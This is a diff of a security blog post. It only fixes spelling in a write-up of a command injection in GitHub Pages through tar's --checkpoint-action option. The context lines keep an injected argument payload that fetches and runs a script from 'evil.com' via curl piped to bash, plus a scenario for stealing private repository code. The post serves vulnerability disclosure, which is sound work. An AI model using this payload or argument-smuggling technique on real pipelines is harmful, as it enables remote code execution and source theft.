joren485/blog/_posts/2022-08-25-github-pages-command-injection.md

 ![Code execution](/assets/github-pages-command-injection/code-execution-id.png)

 Great!
-We have succesfully achieved arbitrary code execution.
+We have successfully achieved arbitrary code execution.

 **Side note:** _Using `--checkpoint-action` is one way to achieve code execution, but not the only way.
 As we have full control over the input, we can exit the `tar` command and execute arbitrary commands.
-But by using `--checkpoint-action`, the `tar` command (and consequently the whole pipeline) will still succeed, making the attack less obivious to a victim._
+But by using `--checkpoint-action`, the `tar` command (and consequently the whole pipeline) will still succeed, making the attack less obvious to a victim._

 ### An Example Attack
-Now, you might be thinking: "You found command injection vulnerablity on a GitHub Actions runner as an admin.
+Now, you might be thinking: "You found command injection vulnerability on a GitHub Actions runner as an admin.
 Big deal.
 So, what?
 Running arbitrary code specified by users is exactly what CI runners are for.
 You just found a way to do it in extra steps."

 And you would be correct.
 However, what makes this exploitable is the fact that it can be triggered through a URL.

 Say we are an attacker that wants to get access to the code in a private repo of a company.
-We can use this vulnerablity to get access to the code:
+We can use this vulnerability to get access to the code:

 1. We craft a malicious payload: `/ --checkpoint=1 --checkpoint-action="exec=curl -s evil.com/script.sh | bash" --exclude=`.
   * This payload downloads and executes a script from an attacker controlled server.